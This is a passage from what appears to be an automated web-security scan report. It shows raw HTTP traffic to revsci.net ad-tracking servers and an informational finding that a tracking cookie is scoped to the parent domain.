Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e2e16fd&3&10055,10194,10534&4e07f4c5&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K08784=82f4957c1a652091&K08784&0&4e39547c&0&&4e140790&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_J08781=82f4957c1a652091&J08781&0&4e3abd4a&0&&4e153a78&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_C07583=82f4957c1a652091&C07583&0&4e4a9497&1&10165&4e23b001&1f1a384c105a2f365a2b2d6af5f27c36; rtc_Ua1q=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; rsiPus_txcj="MLsXtTENJApvJ5G2CtKgxPEJrF4+5C1lsBnrgEjvGi+eSZMchfnrP39kON1J8Dw2ez7PupwpYPP5yKMjmbdmh81UPDhyhpxyS7MO2AwR+rZMYnGA4GC9O9QvN1US1tLIl+LPn43PjJ7qQS/pGvY4QhuHwB8K95+qPEnYJnhaG4+IlaKd2qXTFD5NPxzH14rtpxNxhK/Qq6XR1GVuuD0MACeK9YttnZMRVKNyz145LDIp6sgKiL4Tv8VDrtPM20t4ks65WY2j91xoadjPpjUc7aRhCibeE9+Q0gW1g+GMarobzm3uSc9hihqHb2OuTNZp6HvcfpcSolGNaBNFn6mz9S4GdSRXyLKhtThdQvqgzDnGfGijXgpw4hpzJ+XSnKhaapQctKTTGePlLpcjX6DJ0AbryUPeOOvMt1vqCrWGGbdBnJPWRbmfpSBp+b4N/yIvO8wsWNsUJfELOwJAhvSkB6UA0wJyhIbDEgmaojrzG2g4qtKugltluN2yUYG6vo5rVBvqVcdeOkOkKCZ55Jpdoa/Ha3n0gD14Lny/vNlttrvJLIOJyQuk+fVFtklYOCKaHODtYdsy6UCkT1YKa2maAXdUxNfwJEP6X+bmUSljkLBrbBqPr2B/mk8xFnC4OuI21eh19jz9NrrOuYdaelXVAFfsVYl1N5RHr4poGi0gbBQ3IXaDUUmdxbkCMQjwFsM9XRo+GqH6DuFZyinGxc1pmKcjHZyEZAzw7emay24dMXff2kFeAIfeWnJVoykCyOShHGv6o9h7zZATWIiMyYHQGAnfWEjK9lqylOGKcFHzI1vIEluQgEUI6oDFaLn09Yd8x5HU4LR9I5pAso5hjheZzNKx9GihZwttVIKhHi+7RUxzyQi5WprC/6ARua3XbXuEnwW38MgmC1FcFf2OLrmBTx0NgCfVJ37CxnAT0fGeKaqG9PD6njWPiMNQLpbp1MeSeEIc2ooFnljQQIjq4cujHdr+masfVHuefX0AyFNi/9G8eqNYD/MbSh+5TYW7YTujwPvcm9aBPkFiSjNIveSmBaLoO7RN5jAO/tNDQDdP9QxJWrR4GR76w4sTNRGscEB4YhZiyUTfMuLGuFDDO3LxISk1Vc15oBSA20Uu/imPI820TKoKDPFXxBZPuS2W7/TagpYZOhHUlE1Jhh4hDGMH3+k3OUVHfxA8EFcwLOXecXXGXdkj7OM2CoEWN+1UGLnlNH7DOc6Q8N46vAfkGRXYuoYP29k5ad+fsqXZhbC8LPInaUOdVqv3WPMYA0GEjG8Dc/ycsOJ9YDVJiMpf5jiFRC5gqfpBHEExyKw/xQQF37oOrYfVFI8EMhDDyTZxMnM+QdZo2EL4ThE3vVQz6r6KEbMOAGcFNkhxJO1XNzL4WKOWGHo/kAIaQwPLJlofJFvV34UOEyDjoQodhdauy073JrFFp5liMGyUFlDu9DpafuqmexP1pihpMrhBicoTgU/7oSB3SEeXMCqbty3JnBi96+CSk8KsIK5Axz+lIxx5JsH17oVJwi6n1lmSvUdbQ6V5i4NYrwOD76lwBXRBoTMg4X14dFF1dnGGRQd/hgg2B99u3e1qIw=="; rsi_us_1000000="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"; udm_0=MLv3NyEJZjpv3tsfwM3R13FLZph5RwsMX74DjMz3bMW2ESu9Y8ZcbXi2ufylgqf5+KuSXtSvFzkXantmtaqzVPVjL39L/VBX4yE12lACUkCP5fiHOjMo/nvLxqH4vJmYg/6/op4MgIhdjoWD19q5GsMtQl3FWhcggk3EHU8H9vtdJVlTWa3lAtda3D9o6rz4EoutMEjW+P8XXXkgLX8/tk9TaCm2k8u6kxkQEhoeuR6s520oRjjjyIyEDQq/ALP6ie7QkzFMUcMJwXlG60H4feUKSq9pQAJupFuZmoRmIHnpDmCEbOEP5aNTXX6g6RUeoECj1iWdFdu/P5ge9ytxpFq0yYD4yM90JXpp+4dEGakHm+op+DQ2lq9eJ5b+auq72FMi1QnKbqJXckjv/4q143Xg307JJsr2FLi9pNzEK5pW67okplQUCPwV1yN+re4BtqD1it6OOZMkgrtSUC+6JWEwKrVT+Sz7AEUnPnc+o1HE13LBAfM1/hBUWtPsfFlWEpusaET+HojCKH18xNi8ZO71ZdRnon5cH6S3vrdwbepPiDS/hQo+cr2ZXjPDtbad9ZWXvVJRUY/flKJ8bXsdKJMdjgVDLEgv/13hen2p32/G/4mZbpLnQEVqXOuwzflUsnAPTKDM9sujDU7LyP5jGaMCuDtHZ0R6vriuIq2aZXug09ZKLoZb1kmRKSzr8XyTuBw620Y59saAMXDblbGFb6fWNkdb8ZwbbSTNuXA8vkeY8ac0Fyjur2Ul6y5HUuqIDDkGcRyZQvcZKiilZ7Wr6pA8ULOUhN/YYCW3yI8b5MQ1JTFy7ewIbd6qwaZRNyOPXZeDVMAfPXMvtn2GJNaM35R3Wi0fgZZjw7xJzfF1ieiU2DAViohmEq1oS4gmIwOMaAEjHC/bnvexdcul5zPfp/63Hpw44xVA7qwrtfN64mDIpGa7kMTKAZ5a8mNNlfeqTiDBXJ6xtRcKrB7R8BOaaK+wON+iWJk4/EsnBrVArT/gLxL+fMUWg5faNtSPupzVN6hzYVxvTeDy1Z6Ggk5wPlZvZOpOPu+zPaaZgnohHUTWmP5W1HTB4EehWAZ7JTOez6ZSMIGXYocXoFXkkS8FEp79ESgx4XOy0NmEq4Sf/bwhMCrTWMpP1iwAH7pUCmVeeeLn6xOch3E7x5tiyDt39pZEkJYN7PZQMYK0zZRxstMmc+bV3kqLWsSoVVVvnqXIgwp/Qy2nxhywSQ24f2756xNgEQTEs/lbOA234bXHTI8424AbpwBjjkd2BlnKM4Yg8FplpbdIQH0SBFC5QRotFfVfFq73xxsesANMqu8JIRwkKZk4Ed0cXMR5emrppnxlsvwIwkhJDpTIqSoDzO/qLtuSrLXuKH0mofayI5LV3MF36OrGD6NsQ1k79ol5BTBbji9uqgFDozqLC8soBI686bZWNwvER33HQymsXTJXLHO1dNvSeD0/aebTqgUeOMMIITssyDlC/1zqfW2XPhVMsc4wF70zA1+ctQdguciHtN1VYdad4BlK/mILRDR7TSDdzssT2VJJ/5FYRwR9qgO+DteyvZtdlO8hZXnhNLlOzuk8b36kr6jjMrUPq8x084uPV+5Ll9DIfWyfyc26U/gaYRC6/CP09n0DeMzVZDFgfm10O19FlWNjTOHsP1AvkPgWIP16+NSj2TsCYAvZOYd6nTP2OQgxB2HPKfNKZ/WfRNNCw8o7U2C0FuO1jJMchD+AF+CIl6kFXlORpB0preiAbRXN1KGQOf16gUznmyNc+Ohr; rsi_segs_1000000=pUPF4z+henIMH/C100a+jhgB5JQz9IZjavYaIGbgejnlu1LNx+p24I1oDZUR/PIEreL1khOldyKZKzbWfPrDjgnPXWfftsVz6gi2U+R4C2HA1xNHMznYAaikEDYBtaPV2XgkSL49sR1LHELURF80qJ24YXWBjJG///bIMfJGqlOw4Z4AZ3CFoTpDon75FV/NMnS9d7+7BoPMcvYpkrNJjjSncf8/Tm9TKj6yUVBjCWo4xvb9qeC8gSq2nLRSmNCYM1yBseye7KxDkhsshDOXmN27+9M7Q3oeFU8g9vlvHGGsLhxvOWIwS8wfiQWkOFZ5EfoKopejUGLC2P4BkXhccFd9gjjGhn/2nIZlDq27A5ts/O5ShisZR/cjeNFttmHCQbax31mi/Mr+IcFKBLkaNwtS77a6JYedCl1gREgSQFz0OldjzRPjTwNpGi6dtR7LFm5nmTtTzfhr/llazt+sF0AnaQABHzdVGYfdA9Optl2AoHOU/INrG/Ogkya9282Xplm7goqkYhGXqgVKQTOUDYyzTGrlVxHfQu8kwsnwDUZabfXSGjZvazqrgfU+eD84FV8J+M8+RCwhNiaXT1A1gGv/MhA0gPGksZKqS/GiHiO4e+geO6MglCgYzua4hMlYeUhqTQONARkRmjCoFpHGaIjt938Ov7cwFhTJ+floCktqNfDU2irZga+RHH3pN3EhqUooOgLPceT5sM4qX/GxXXleeX07vTY2vesq8/0bXt+eJvyDhYWBKGXbZx3JqUJEKBqgOTl4ldDX44taxWqbhf9dOkLoxI7xsWo=

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF4z+henIMH/C100a+jhgB5JQz9IZjavYaIGbgejnlu1LNx+p24I1oDZUR/PIEreL1khOld6I67wyCcvrDjgnPXWfftsVz6gi2U+R4C2HA1xNHMznYAaikEDYBtaPV2XgkSL49sR1LHELURF80qJ24YXWBjJG///bIMfJGqlOw4Z4AZ3CFoTpDon75FV/NMnS9d7+7BoPMcvYpkrNJjjSncbWRokElhKIqZ0wJF9tLA8AVKLKQnIom91GqEmtEhM5XY0AatgHAIlbu+jKhn7uSasiHr74K5PeGMCi1DXS91gFPiUVPN7NZjpaMjeUkVvvBEhtaCpyjQkkG9jLQQ3K8F9JXFdrzMA8MDWGlZ+Vju7e7eWtnHFWU3gOpKn7gPs31PEE1DiD2CZapLXs7AIbyuDDoWXF6ktBBStu0k56KlcXhvOA+mj6A6PgjB4ALyhPu3oeMTIALjZn3hx2WIVWWKybwlEZ10BC4K7+umeJXXurtrvh7lSNk2KhUazcIMzy7DuynwDAilMbbbmsoo4vojZLD0nQfSTwk4boSw0q2h3KsvO/zGi+l+gt/Wyw3bO7qyU6Ncw4h5TjyHLQOLJTDSgAx92fnqrLLEyJuCK4wlmsCrb6KROgq885iXyLw2iBH1f1Xz2vUmnkx3wgRyaUKX/L6O2NlT1599Fgobn/4FWXhjyVT6MUK1GdNbwalGQnmK2G/mWTUnr23ChWE5vMzJkLCyrpJF9qetK+qXvvwrzIJhHe9vRi9jbIrOuclFZP96Ajz7EXC3BMGtQpfo0uCHbmmgKh1; Domain=.revsci.net; Expires=Sun, 22-Jul-2012 04:31:01 GMT; Path=/
Set-Cookie: udm_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: udm_0=MLv3NzMJZjpn3hepL/sKOQzMPAgC9snnjELcqFbWhmRKTjkEarwaUQo9AQIc2HCTUsGSvg7FWc1FuYZjdc3F+16bIw7iBeJkNHcwDY154WjqYiYrsKNH4H1dy334j5gm5nSWh6u+GJ1X3wmqvojunnI5GoE7vEdN8KAD+4IgUpnKAaBCpxqXaQcl9qnb8OmIA4N+GstG9gmvg1EwKlcao2a4KpqrPAFBCfIz7tSr5mPwLkbDxlHpBCucior6IpWdhKtNyoy/88gXxj8uVMRW/Gh553T7eDk8VOVxE8UJJWdOX7p4qGhiCmfOHzFRhvKbvaqm+izgkMtH39Cch3LcT46U2NLrli0ewvymJU6mJYvahJvzgkDm5rt+1mkpQ+tOB4lSn/ZP7BRoT5knVtscyXaOaw0QTGGtvhyiltPuQhUn/iI8B1nXx1a5U7mlkzCTINROWxWb3e6xNnVLz3l2ak9ydVrN1jwtpswKUoPc7UBxKQT0cHinvn42TRKv9O4CieL8sgrPi/vCXu1Q13I5e62QGSfFQW+e1mvhOZwSnLECxdtefZKXR5jGRDOS9r2eK92BmHb/KGQtdUqP3v0gIz0/GPnZPS2m0Mw5/6/oA4kloLsdkdUWKyF45A31s4Gx/Ui0f0BK8gtigHxQ+KAcpHfdhlQZ3Gmkel8KNANjANV3WZS4FER1yBnZiQU4NgZDZdgTup7KYS+n5sVFcnqyAp82Bp/t+5gHRHbif44H6kBDey6tys8Znm4Sy8nzRr08sDVMi9vaodKux4gzJ4E1/VMC2SoiA8K/TXIij46AvltYt2wKBA9SOjyANGPxOgDxzX4zt/9H1QMydTyCdFyzkJ8p7Wl10PcblUXPqFXH8DqbgvCKOkeIqwk7OENLiCI/C4wnE3cYvdnM9QN8nYm9M9Oj4sQK+N5ow7Nesa0VGPGDd8S7gfLVr5E1mN497xp2rgs23SiNwGJM+S4Lf/nqLJz94Q2ooQpv4EGwK023hl2hjQXO1rb4dDIaify9MHWRnqay9hP9FpWTWj4SMmWalGeeTsDbHYckfFs97XBnMS5I8/lnC+bVOxZRYfQb/OId2njIq2AjyBNVJOMV/LWW3+eLaSr3NuHLxOEkcAH0FeVEO7GmsSHWzo0ObLc8sEWg/UpuMnaQfZIIXbi9nx2oES+Oy3J4qd53X9y5p/whPjwfkp4tYRaD6f/EDcBJ+ywWJqVTmXb/AWlYzQKE9BHTlsObIf3TRKh5s9/WcQeAXoVDXrOWxxfHWWSuDhA8GB+7ihZf1plL8rbOHPfmCIniQDfmE/1wVs1FuF3zNQuvFpwLFjz1iagCgq/TNqHIXeMUwQOmErB957UgSfbzaYZCBvOtTsA/Wz0Bw1ZdNLxbdXYMu+HDeW712rfJoYl9XYEon3pooXuoMuohTU9crJ/jjqLMiRxUuxG/7Kgd26dlxtxmqYl9UaJTUc2shrP6Jhi4cTogy1HbiJdfS6K5b9nXpMZoyE+aW0nEzLmvXKHNFQWw49neIQvdt8FotPwZSkHcoCedkD89b5wzCDwEBJYED2Dpp0K6Ca7oNaOtdvO7GrnXhvPw3JKzmkB20gj7MEHNb8jOR+ulgL6kEPuiW6sDAhZ40eiJ3JrVjvn4DTpfXGcgBRg5lUrD4mtyfjFnDCFuyeedSmFPo0xd4RAxioEVFdXRsx8lrgZwLJNDIXvKah5iX513JiE5+GA/Szm0X2DD6vuiDlHkzqxi8C+azXz9IuAn9Z9k00gHjGhrDzYSdvYimeF1M6dJ4aQPL4h0ICE5eGDfnejinVFdwbUrDZq2BnpYgZloN/DKzM/Hd9CZ5wswSCrXmiBjAtdi; Domain=.revsci.net; Expires=Sun, 22-Jul-2012 04:31:01 GMT; Path=/
X-Proc-ms: 3
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sat, 23 Jul 2011 04:31:00 GMT
Content-Length: 1254

/* AG-develop 12.7.1-48 (2011-07-13 07:11:32 UTC) */
rsinetsegs = ['D08734_72087','D08734_72092','D08734_72133','D08734_72099','D08734_72131','D08734_72435','D08734_72581','D08734_72639','D08734_72674
...[SNIP]...

10.133. http://pix04.revsci.net/G07608/a4/0/0/pcx.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/G07608/a4/0/0/pcx.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPF4jOhOAIMfzbhwEW4hpgx58EwQ6XJ4CPHPZPoktr5vw8bnoos/uNhWv/wPkIcMx/u6vH1A3WagFQk9HdSufRaWv3lncieJ5Uar6gijM+JLg7jdfeYKfugZxQVQy6oyTBw9EWjDSBB8v8jb65r0eeyWjePC1nNM3F9Uq187o0HW0axE8sAtySdh8flbc9fEe+ByFrfdr2P9O5m88mx/qMFsQg6JYmnz3Xh5hhfIdZ9KdwLdCo3ifHr2uAl7glBHZLy9Y/dF3nNf3m/tVO7I9B8jqfgOXo6hGSyD7+erFVtzxRrbRKTw0TA/QkUh2hwphhqfmni0/lyItG0Zz063E/r87yhw23ZcxAdOy4s5riEHFsW5joSbGno/lZnOey5M7uyjwm61OR51f8f7uruUJg3K5t2JKt3XwxV5g6C2ZvAKzBo1nwnukBaSO9LYymty6Tl+JzKzZX6S0Dniz99qrV3PVTTCAHg9gTLe276sJOGdewyfqgwceUztUNJmaXW4rwEJHcS9TgAyAHt/CSf+2rsOziBbqUC+9DI3fkARDvaEg2CvBFmct6E8Lo2S86B0JPt16OqrKDt1jeuMvYgXWfRe6+qdmhU3IhIm8R4QCXIp+1ZbTEoYE3ijpRkTuvj0cKzw4z5edHVGva0B5+pllchESdonBIIHYugT/tZhKv7M/CKZ3OwjZX/1ElV8nMa6C/vfi9M7WKkXM1T11yAo9Jt8vF/WK5aE1laUHeoBVk/TZNA4gxLLheN+aTb2tRrDRlvqrA101jcE/pLQNJgYU+rcOv4JS3E2PWi; Domain=.revsci.net; Expires=Sun, 22-Jul-2012 04:31:00 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /G07608/a4/0/0/pcx.js?csid=G07608 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/article/SB10001424053111904233404576462461660747244.html?mod=WSJ_hp_LEFTWhatsNewsCollection
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e2e16fd&3&10055,10194,10534&4e07f4c5&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K08784=82f4957c1a652091&K08784&0&4e39547c&0&&4e140790&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_J08781=82f4957c1a652091&J08781&0&4e3abd4a&0&&4e153a78&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_C07583=82f4957c1a652091&C07583&0&4e4a9497&1&10165&4e23b001&1f1a384c105a2f365a2b2d6af5f27c36; rtc_Ua1q=MLuv+zc1JrZq54oEHs8PEvCGhKR0ZTrUbN6Xt69gsCyMrL8YUQibDfcigAU/UW5pK0V6ORAtnuk3Lzcscz1qRDc8/i5985SrjUCFkN8Wo8BV+DIrqgvzuoFhl0i0vgU4bNC5zmQNyiuXngaZgfjPuxSh3Tl4t537epU/KcWxP8AidPKBrMgkO+Mg3dc0ltvU2mYNdnjrxVtf0t3OdZ6IvcmcGFmrFfgUDtNpge6vochi5cVY7lZTCJBe8Lg1l3NRpoX+T4HDRI3Se0YH22eLy7TXP18OOgVO59ui9Fy84/yKaZNSB5t/YoEXSpcwpmxFS1r08NH52q5BUhEhNqFbqzDk7hz1GKHGmqchveUwpMksujn9D9dFjkiWd+IJbLZ9sjqY+hFmlY5X/btk2OkRINmvNTfD8ZGIJTCa+PXfDSRNVvYosRPlJ4WvUhMW84UcmPMZ4SJWfPRjqYT2TVM+tizx5OcdM8ZPBfRdEb+wAFq3Qh/pOmfUdX6FJadMXFBuGSHYqQAmeIJL9eGS69y1EjYLVCdZSy4C+bYioGL4p/yUc6Q6pjWJWSnBNT8Jf31GSZ077a/Ix/X43zf7KEZTQjqrPtrP0uQNPpx4FUr3ebBhGFL7RKDr9T3sLBw0FLRCWzNdwrKf13upXMKlT5FhZittIBD8som6zzIkwku7nyEl9mMRETiRodzAnp/8Y1+WU16dzBIPeg7sextYPxcA4PwOfPLVGyLbmCu0LHhyy0UjKIpDhXBCJzeDcYx6vAAcfgd1rWwMunczDzVou/th/GOWXgP6noD6D0vDTngwMv9DcAH0uL+tXDW/WnpI6znu7sZwoFotIB8m+GGrIC9DOo6Z9oV3kVnYgm0GjZvjh3TCFDaN0THETBriVBep3gPBLm61enyxGKMGXT6Xq2+y/x3LYM6I6LEzAxnhVcU3pYjDhwFyvxZgucgs7KhR+RIllmK5/vsJEmGXxi79WzHaTbnWI4WniOhhMHOJIX47nRkXZxcy+tlI8odk